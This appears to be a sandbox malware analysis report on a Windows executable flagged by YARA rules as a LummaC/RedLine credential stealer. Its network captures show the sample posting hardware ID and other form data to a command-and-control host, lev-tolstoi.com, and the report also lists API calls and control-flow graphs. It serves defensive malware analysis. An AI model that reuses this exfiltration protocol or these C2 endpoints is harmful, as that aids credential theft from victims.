2024-12-28 08:59:03 UTC | 182 | IN | Data Raw: 63 6f 6e 74 33 54 33 59 2f 54 67 4f 51 7a 70 72 62 77 4b 64 41 78 55 54 79 48 58 37 48 31 79 71 4d 67 50 43 32 6a 43 2b 75 34 79 32 57 53 70 50 75 51 78 38 4f 64 7a 57 61 50 6b 2b 31 68 39 47 68 30 61 5a 2f 6a 6e 57 6d 2b 34 33 42 4a 4d 63 49 72 75 70 6a 6a 51 4a 2f 42 36 37 53 7a 36 34 33 46 63 70 71 75 78 46 6e 77 45 55 45 63 6f 31 66 6c 37 63 61 37 46 43 77 64 39 78 50 72 69 4d 39 68 76 6f 7a 43 75 62 62 50 72 59 52 54 78 35 49 41 56 64 51 4a 65 56 47 66 41 70 57 6f 2f 70 4d 4a 45 56 43 2f 49 2b 65 59 77 30 47 75 6a 4d 75 38 76 2f 0d 0a
Data Ascii: cont3T3Y/TgOQzprbwKdAxUTyHX7H1yqMgPC2jC+u4y2WSpPuQx8OdzWaPk+1h9Gh0aZ/jnWm+43BJMcIrupjjQJ/B67Sz643FcpquxFnwEUEco1fl7ca7FCwd9xPriM9hvozCubbPrYRTx5IAVdQJeVGfApWo/pMJEVC/I+eYw0GujMu8v/
2024-12-28 08:59:03 UTC | 1369 | IN | Data Raw: 34 31 38 37 0d 0a 65 74 38 58 61 47 73 70 78 6c 2b 43 6c 78 4d 4b 4e 37 76 64 6e 71 6e 79 51 41 4b 59 49 53 35 70 6a 6a 45 4a 2f 42 36 77 51 54 47 72 6c 68 75 36 62 76 37 41 54 6f 46 55 51 4a 2f 6e 2b 64 77 63 36 76 42 41 67 56 6a 7a 76 37 74 4d 39 64 6a 70 44 50 72 4a 66 4c 70 66 46 57 74 71 4c 38 65 65 51 46 53 54 53 6a 58 71 7a 30 2f 70 4e 5a 45 56 43 2f 68 34 4f 30 78 32 69 65 33 64 50 64 6a 39 4f 41 35 44 4f 6d 6f 76 42 35 38 42 31 46 44 49 64 66 75 65 33 75 69 79 41 49 50 59 4d 44 79 35 7a 44 59 61 36 59 77 37 79 4c 2f 35 33 5a 66 72 4f 54 37 57 48 30 61 48 52 70 6e 37 75 68 6c 61 4c 50 43 52 42 4d 68 33 62 66 68 4d 35 77 2f 36 44 76 38 4b 66 6e 69 66 46 75 73 70 37 6f 66 64 77 52 52 53 43 37 58 37 58 78 32 73 63 30 49 41 6d 6a 4b 2b 2b 67 79 31 6d
Data Ascii: 4187et8XaGspxl+ClxMKN7vdnqnyQAKYIS5pjjEJ/B6wQTGrlhu6bv7AToFUQJ/n+dwc6vBAgVjzv7tM9djpDPrJfLpfFWtqL8eeQFSTSjXqz0/pNZEVC/h4O0x2ie3dPdj9OA5DOmovB58B1FDIdfue3uiyAIPYMDy5zDYa6Yw7yL/53ZfrOT7WH0aHRpn7uhlaLPCRBMh3bfhM5w/6Dv8KfnifFusp7ofdwRRSC7X7Xx2sc0IAmjK++gy1m
2024-12-28 08:59:03 UTC | 1369 | IN | Data Raw: 4b 4f 48 6d 66 6c 4f 69 72 4c 34 58 66 42 42 52 54 44 58 61 2b 57 45 2f 37 59 34 44 46 43 2b 63 74 39 41 34 7a 48 65 72 65 4e 38 31 38 50 70 79 57 61 58 6b 71 6c 5a 6a 51 6c 70 4f 5a 34 65 72 64 58 43 71 7a 51 73 4e 5a 73 6a 36 34 7a 62 5a 5a 71 34 2b 35 43 6e 7a 36 6e 39 56 72 4b 36 32 47 58 41 4c 57 6b 6f 67 33 50 6b 7a 4d 65 50 4a 48 45 77 33 68 4e 37 68 4c 64 4a 33 36 43 57 67 4f 72 50 72 64 52 54 78 35 4c 45 53 64 51 5a 61 54 69 48 61 37 58 35 2b 72 4d 38 45 41 32 76 50 2f 75 41 2b 30 57 4b 6c 50 76 77 70 2b 4f 4e 31 58 61 57 70 39 56 59 36 42 55 55 43 66 35 2f 61 66 6e 47 74 79 52 4a 4d 63 49 72 75 70 6a 6a 51 4a 2f 42 36 37 79 2f 38 37 33 5a 58 71 71 57 2f 43 6d 67 4f 56 45 6f 69 30 2b 42 39 65 62 48 49 43 77 56 73 78 2f 37 68 4e 39 42 74 71 7a 32
Data Ascii: KOHmflOirL4XfBBRTDXa+WE/7Y4DFC+ct9A4zHereN818PpyWaXkqlZjQlpOZ4erdXCqzQsNZsj64zbZZq4+5Cnz6n9VrK62GXALWkog3PkzMePJHEw3hN7hLdJ36CWgOrPrdRTx5LESdQZaTiHa7X5+rM8EA2vP/uA+0WKlPvwp+ON1XaWp9VY6BUUCf5/afnGtyRJMcIrupjjQJ/B67y/873ZXqqW/CmgOVEoi0+B9ebHICwVsx/7hN9Btqz2
2024-12-28 08:59:03 UTC | 1369 | IN | Data Raw: 47 39 45 76 71 4f 71 56 6d 4e 43 57 6b 35 6e 68 36 74 31 64 71 58 4a 41 67 4a 39 77 66 48 70 4d 4e 56 75 72 44 4c 74 49 2f 66 6f 66 6c 47 71 71 4c 34 66 65 51 31 5a 53 79 6e 57 35 44 4d 78 34 38 6b 63 54 44 65 45 31 76 30 38 30 47 72 6f 4a 61 41 36 73 2b 74 31 46 50 48 6b 75 52 5a 2f 41 6c 64 45 49 39 72 74 65 58 71 6a 78 51 63 44 61 38 4c 7a 36 54 2f 58 62 71 6b 38 36 79 6e 34 36 6e 52 58 72 36 4c 31 56 6a 6f 46 52 51 4a 2f 6e 38 74 6f 63 71 2f 4a 52 42 4d 68 33 62 66 68 4d 35 77 2f 36 44 48 69 4a 2f 54 73 64 46 65 68 6f 62 45 53 66 77 4a 56 55 43 2f 66 37 47 46 74 6f 38 63 42 41 47 7a 45 38 2b 41 32 32 6d 53 73 65 71 42 6a 39 50 51 35 44 4f 6d 4a 75 52 39 54 42 55 59 43 4f 4a 48 79 4d 33 69 76 6a 6c 78 4d 62 73 2f 39 36 54 4c 66 59 61 73 78 36 79 6e 79
Data Ascii: G9EvqOqVmNCWk5nh6t1dqXJAgJ9wfHpMNVurDLtI/foflGqqL4feQ1ZSynW5DMx48kcTDeE1v080GroJaA6s+t1FPHkuRZ/AldEI9rteXqjxQcDa8Lz6T/Xbqk86yn46nRXr6L1VjoFRQJ/n8tocq/JRBMh3bfhM5w/6DHiJ/TsdFehobESfwJVUC/f7GFto8cBAGzE8+A22mSseqBj9PQ5DOmJuR9TBUYCOJHyM3ivjlxMbs/96TLfYasx6yny
2024-12-28 08:59:03 UTC | 1369 | IN | Data Raw: 6d 32 39 55 41 36 52 56 35 51 4e 64 6e 6f 5a 58 7a 6b 38 44 6f 72 64 63 6e 78 38 53 37 69 57 61 38 67 34 79 58 6b 2f 54 56 42 71 71 71 37 48 32 78 43 45 77 49 6f 6e 37 4e 4b 50 2b 75 4f 4f 30 49 76 33 4c 65 2b 66 2b 6c 6b 70 6a 54 70 4e 65 4b 68 58 6b 36 6b 6f 71 49 4a 4f 6b 77 64 52 47 65 48 75 7a 30 2f 70 39 39 45 56 44 2b 57 72 4c 4e 73 69 7a 66 36 4a 61 41 36 73 2f 6f 35 44 50 76 71 39 51 6f 36 57 68 30 46 4a 4d 33 35 64 58 79 31 7a 55 4d 79 55 65 72 77 34 44 72 62 64 2b 6f 55 35 54 66 30 72 44 63 55 70 75 54 74 49 54 70 4b 48 58 31 70 6e 2f 4d 7a 4a 2b 50 37 42 77 4a 68 77 2b 48 33 63 76 4a 67 72 6a 2f 70 4d 37 48 43 63 6b 43 75 35 50 74 59 66 45 49 46 45 6d 6d 66 37 32 49 2f 2b 35 35 57 56 7a 71 58 6f 4c 5a 74 77 79 6d 78 65 76 68 6a 71 37 34 33 46
Data Ascii: m29UA6RV5QNdnoZXzk8Dordcnx8S7iWa8g4yXk/TVBqqq7H2xCEwIon7NKP+uOO0Iv3Le+f+lkpjTpNeKhXk6koqIJOkwdRGeHuz0/p99EVD+WrLNsizf6JaA6s/o5DPvq9Qo6Wh0FJM35dXy1zUMyUerw4Drbd+oU5Tf0rDcUpuTtITpKHX1pn/MzJ+P7BwJhw+H3cvJgrj/pM7HCckCu5PtYfEIFEmmf72I/+55WVzqXoLZtwymxevhjq743F
2024-12-28 08:59:03 UTC | 1369 | IN | Data Raw: 57 64 41 56 4c 55 32 65 52 71 33 77 2f 2b 2f 64 45 52 43 2f 37 75 61 59 6e 6e 44 2f 6f 44 2b 30 74 2f 65 74 76 52 65 53 44 75 78 39 37 46 45 31 56 4b 4a 44 46 52 56 37 6a 67 45 51 4b 4c 35 79 6c 71 48 2f 59 64 75 68 69 76 6e 47 6f 75 53 6f 44 2b 66 61 71 56 6d 4e 43 53 77 4a 2f 6a 61 55 7a 62 65 4f 57 52 45 74 73 31 75 58 67 50 4d 70 6b 37 77 54 51 42 50 33 72 65 45 4b 35 71 62 6b 35 65 52 4e 58 66 42 6e 4b 36 48 31 78 70 4e 67 56 54 43 47 45 2b 4b 5a 6e 35 53 66 67 65 74 46 74 73 2f 51 35 44 4f 6d 52 74 68 5a 30 42 55 74 54 61 76 6a 6c 64 48 36 31 33 67 6b 41 54 73 66 6d 37 48 2b 53 4a 36 35 36 74 6e 47 39 72 48 31 46 36 66 7a 6c 53 69 46 58 44 68 56 33 6a 66 51 39 5a 75 50 59 52 46 51 39 69 72 66 30 66 34 51 6e 37 7a 6e 38 4d 66 58 76 62 31 66 75 6d 6f
Data Ascii: WdAVLU2eRq3w/+/dERC/7uaYnnD/oD+0t/etvReSDux97FE1VKJDFRV7jgEQKL5ylqH/YduhivnGouSoD+faqVmNCSwJ/jaUzbeOWREts1uXgPMpk7wTQBP3reEK5qbk5eRNXfBnK6H1xpNgVTCGE+KZn5SfgetFts/Q5DOmRthZ0BUtTavjldH613gkATsfm7H+SJ656tnG9rH1F6fzlSiFXDhV3jfQ9ZuPYRFQ9irf0f4Qn7zn8MfXvb1fumo


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        3192.168.2.649722104.21.66.864433524C:\Users\user\Desktop\5Z19n7XRT1.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-28 08:59:04 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=OVN8F7K2V
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 12800
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                        2024-12-28 08:59:04 UTC12800OUTData Raw: 2d 2d 4f 56 4e 38 46 37 4b 32 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 31 37 37 42 36 36 31 35 46 42 39 30 46 43 46 39 46 31 42 37 31 33 36 41 31 45 30 43 35 45 0d 0a 2d 2d 4f 56 4e 38 46 37 4b 32 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 56 4e 38 46 37 4b 32 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 4f 56 4e 38 46 37 4b 32 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
Data Ascii:
  --OVN8F7K2V
  Content-Disposition: form-data; name="hwid"

  F1177B6615FB90FCF9F1B7136A1E0C5E
  --OVN8F7K2V
  Content-Disposition: form-data; name="pid"

  2
  --OVN8F7K2V
  Content-Disposition: form-data; name="lid"

  4h5VfH--
  --OVN8F7K2V
  Content-Dispositi
2024-12-28 08:59:05 UTC  1128  IN  HTTP/1.1 200 OK
Date: Sat, 28 Dec 2024 08:59:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=vikdjs9b887qetu7l867lhd0t5; expires=Wed, 23 Apr 2025 02:45:44 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lVxQLIIqu3KX7Cy5l9%2FbQLeGFBMAfenRqr8iurRgBiXozzH%2BwZJKjCb8h4JjPNEyoeY0%2FJ7BIdPYg1lgbyK0brv7zlKkjU9EtGqwJuEn7F7QHhJO38y5TbjIOiIeWmwi7Rc%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f905a2b6dad43c1-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2296&min_rtt=2289&rtt_var=873&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2835&recv_bytes=13730&delivery_rate=1243611&cwnd=223&unsent_bytes=0&cid=f760cb91fa11416f&ts=1052&x=0"
2024-12-28 08:59:05 UTC  20  IN  Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii:
  f
  ok 8.46.123.189
2024-12-28 08:59:05 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.6  49728        104.21.66.86    443               3524  C:\Users\user\Desktop\5Z19n7XRT1.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-28 08:59:07 UTC  274  OUT  POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=12MYHXJSEBX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15058
Host: lev-tolstoi.com
2024-12-28 08:59:07 UTC  15058  OUT
Data Ascii:
  --12MYHXJSEBX
  Content-Disposition: form-data; name="hwid"

  F1177B6615FB90FCF9F1B7136A1E0C5E
  --12MYHXJSEBX
  Content-Disposition: form-data; name="pid"

  2
  --12MYHXJSEBX
  Content-Disposition: form-data; name="lid"

  4h5VfH--
  --12MYHXJSEBX
  Content-D
2024-12-28 08:59:07 UTC  1127  IN  HTTP/1.1 200 OK
Date: Sat, 28 Dec 2024 08:59:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=g077gi13thffbv9migdvt87u0u; expires=Wed, 23 Apr 2025 02:45:46 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d%2BXSDW5jiOHGYDoaLrClHRRcWeyspQG9Hrva7UkkbyBxg2wR9eD80KO2PvcNdoZbeHGjVBsIsuNTlNAFR5DMAMlEiwlidwNUCdsbyc7aagMdW3z%2FmY1HNxTCMHi69xY%2BhP4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f905a3a6d77728a-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1875&min_rtt=1823&rtt_var=721&sent=11&recv=19&lost=0&retrans=0&sent_bytes=2834&recv_bytes=15990&delivery_rate=1601755&cwnd=227&unsent_bytes=0&cid=5cc53d32f6a48626&ts=833&x=0"
2024-12-28 08:59:07 UTC  20  IN  Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii:
  f
  ok 8.46.123.189
2024-12-28 08:59:07 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.6  49737        172.67.157.254  443               3524  C:\Users\user\Desktop\5Z19n7XRT1.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-28 08:59:09 UTC  281  OUT  POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=2520NUERQYQ21JEFV9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 19958
Host: lev-tolstoi.com
2024-12-28 08:59:09 UTC  15331  OUT
Data Ascii:
  --2520NUERQYQ21JEFV9
  Content-Disposition: form-data; name="hwid"

  F1177B6615FB90FCF9F1B7136A1E0C5E
  --2520NUERQYQ21JEFV9
  Content-Disposition: form-data; name="pid"

  3
  --2520NUERQYQ21JEFV9
  Content-Disposition: form-data; name="lid"

  4h5VfH--
  --2
2024-12-28 08:59:09 UTC  4627  OUT  Data Raw: [binary payload, non-printable]
2024-12-28 08:59:10 UTC  1129  IN  HTTP/1.1 200 OK
Date: Sat, 28 Dec 2024 08:59:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=bfhjvloio1nfji1mcg2uf4im7m; expires=Wed, 23 Apr 2025 02:45:49 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VRG1vJxdJ9E9khXsQtILd69Ket7PZ%2FDBnDEkc4rRy0nfw4SpVjFWd8aTQ5n1dag%2FP9J%2FmlrVTDvdxHY5B1866r4KytUC5kAZDymJ%2BefGDse5qcofjbaiACyZrET7XYTrG7k%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f905a49b8e118f2-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1531&min_rtt=1501&rtt_var=584&sent=11&recv=22&lost=0&retrans=0&sent_bytes=2835&recv_bytes=20919&delivery_rate=1945369&cwnd=232&unsent_bytes=0&cid=d394d981a16b5438&ts=984&x=0"
                                                                                                                                                                                                                                                                        2024-12-28 08:59:10 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                        2024-12-28 08:59:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0
Target ID:0
Start time:03:58:50
Start date:28/12/2024
Path:C:\Users\user\Desktop\5Z19n7XRT1.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\5Z19n7XRT1.exe"
Imagebase:0x400000
File size:375'296 bytes
MD5 hash:FB4F1803FBFC70BC55B61BF418D52D3D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2391091654.0000000003038000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2390625549.00000000008B8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000003.2160718112.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2390650962.000000000092D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:low
Has exited:true

Target ID:5
Start time:03:59:09
Start date:28/12/2024
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 1880
Imagebase:0x290000
File size:483'680 bytes
MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true


Execution Graph

Execution Coverage:3.4%
Dynamic/Decrypted Code Coverage:21.2%
Signature Coverage:62.1%
Total number of Nodes:132
Total number of Limit Nodes:11

Control-flow Graph

APIs
• CoCreateInstance.OLE32(0043F68C,00000000,00000001,0043F67C), ref: 0043640E
• SysAllocString.OLEAUT32(FA46F8B5), ref: 0043646A
• CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004364A7
• SysAllocString.OLEAUT32(w!s#), ref: 004364FB
• SysAllocString.OLEAUT32(A3q5), ref: 004365A1
• VariantInit.OLEAUT32(?), ref: 00436613
• VariantClear.OLEAUT32(?), ref: 00436775
• SysFreeString.OLEAUT32(?), ref: 004367A0
• SysFreeString.OLEAUT32(?), ref: 004367A6
• SysFreeString.OLEAUT32(00000000), ref: 004367B3
• GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 004367E7
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
• String ID: A;$BC$C$T'g)$X&c8$Y/9Q$w!s#$z7}9A3q5
• API String ID: 2573436264-4124187736
                                                                                                                                                                                                                                                                          • Opcode ID: 1a7a540a913549243f643d940beb1ec8542d667b59db154e60dd983501a017ec
                                                                                                                                                                                                                                                                          • Instruction ID: 522da010f1620deffab12e26d595bfb80e0736a5a48a815d81ab8756012ad252
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a7a540a913549243f643d940beb1ec8542d667b59db154e60dd983501a017ec
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7112EC72A083019BD314CF28C881B6BBBE5FFC9304F15992DF595DB290D778D9058B9A
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: in~x$kmbj$ydij$Z\
                                                                                                                                                                                                                                                                          • API String ID: 0-979945983
                                                                                                                                                                                                                                                                          • Opcode ID: 26ca6100dcfc97b8c0c6fbf8c4ee366fc87c8afe50c98e0e46493e49499a4975
                                                                                                                                                                                                                                                                          • Instruction ID: a7131c4719c006be066284edc26e6de5161f51a5f0bff666fc31d9b99828dd7c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26ca6100dcfc97b8c0c6fbf8c4ee366fc87c8afe50c98e0e46493e49499a4975
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 107249B5600701CFD7248F28D8817A7B7B2FF96314F18856EE4968B392E739E842CB55

Control-flow Graph

control_flow_graph 413 4210e0-421128 call 43c9a0 416 42112e-421190 call 414040 call 438e30 413->416 417 42188f-42189f 413->417 423 421192-421195 416->423 424 421197-4211bd 423->424 425 4211bf-4211c3 423->425 424->423 426 4211c5-4211d0 425->426 427 4211d2 426->427 428 4211d7-4211f0 426->428 429 42128f-421292 427->429 430 4211f2 428->430 431 4211f7-421202 428->431 434 421296-42129b 429->434 435 421294 429->435 432 42127e-421283 430->432 431->432 433 421204-421274 call 43a9b0 431->433 437 421287-42128a 432->437 438 421285 432->438 441 421279 433->441 439 4212a1-4212b1 434->439 440 4217be-4217f3 call 438e70 434->440 435->434 437->426 438->429 442 4212b3-4212e1 439->442 447 4217f5-4217f8 440->447 441->432 444 4212e7-421306 442->444 445 421499-42149d 442->445 449 421308-42130b 444->449 448 42149f-4214a2 445->448 450 421822-421828 447->450 451 4217fa-421820 447->451 452 4214a4-4214a8 448->452 453 4214aa-4214bb call 438e30 448->453 454 421367-421383 call 4218a0 449->454 455 42130d-421365 449->455 457 42182a-421830 450->457 451->447 458 4214cf-4214d1 452->458 472 4214cb-4214cd 453->472 473 4214bd-4214c6 453->473 454->445 466 421389-4213b2 454->466 455->449 461 421832 457->461 462 421834-421846 457->462 464 4214d7-4214f6 458->464 465 42178c-421791 458->465 467 42188d 461->467 470 42184a-421850 462->470 471 421848 462->471 474 4214f8-4214fb 464->474 468 421793-42179b 465->468 469 42179d-4217a1 465->469 477 4213b4-4213b7 466->477 467->417 478 4217a3 468->478 469->478 479 421878-42187b 470->479 480 421852-421874 call 43a9b0 470->480 471->479 472->458 481 4217a5-4217a9 473->481 475 421535-421570 474->475 476 4214fd-421533 474->476 482 421572-421575 475->482 476->474 483 4213b9-4213da 477->483 484 4213dc-4213f7 call 4218a0 477->484 478->481 487 42187f-42188b 479->487 488 42187d 479->488 480->479 481->442 486 4217af-4217b4 481->486 489 421577-42159d 482->489 490 42159f-4215ad 482->490 483->477 501 421402-421419 484->501 502 4213f9-4213fd 484->502 496 4218a0-4218b4 486->496 497 4217ba-4217bc 486->497 487->457 488->467 489->482 494 4215b1-4215bc 490->494 499 4215c3-4215e0 494->499 500 4215be 494->500 498 4218c0-4218c2 496->498 497->440 504 4218c4-4218cf 498->504 505 4218dc-4218e0 498->505 507 4215e2-4215e6 499->507 508 4215eb-4215fc 499->508 506 42169e-4216a1 500->506 509 42141b 501->509 510 42141d-421497 call 407f60 call 413c70 call 407f70 501->510 502->448 513 4218d1-4218d4 504->513 514 4218d8-4218da 504->514 511 4216a3-4216aa 506->511 512 4216ae-4216cd 506->512 515 42168d-421692 507->515 508->515 516 421602-42167c call 43a9b0 508->516 509->510 510->448 511->512 518 4216cf-4216d2 512->518 513->498 519 4218d6 513->519 514->505 522 421696-421699 515->522 523 421694 515->523 526 421681-421688 516->526 524 4216d4-42171b 518->524 525 42171d-42172d 518->525 519->505 522->494 523->506 524->518 528 421767-42176a 525->528 529 42172f-421733 525->529 526->515 532 42177b-42177d 528->532 533 42176c-421779 call 438e70 528->533 531 421735-42173c 529->531 536 42173e-42174a 531->536 537 42174c-421759 531->537 535 42177f-421782 532->535 533->535 535->465 541 421784-42178a 535->541 536->531 542 42175b 537->542 543 42175d 537->543 541->481 545 421763-421765 542->545 543->545 545->528
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: !@$,$T$U$V$h
• API String ID: 0-1072848446
• Opcode ID: 1b37148a9dca08e68feec6fc32ee7d5c05668dd5b0338c2dc7096b623dae1273
• Instruction ID: 7f4f8c271271a0ee30063bf5d57d9afa0b4a7bb7edff0777766b2e5d54dfe869
• Opcode Fuzzy Hash: 1b37148a9dca08e68feec6fc32ee7d5c05668dd5b0338c2dc7096b623dae1273
• Instruction Fuzzy Hash: CF22E17160C3A08FD320DF28D44436FBBE1ABD6314F598A2EE5D9873A1D77988458B4B

Control-flow Graph

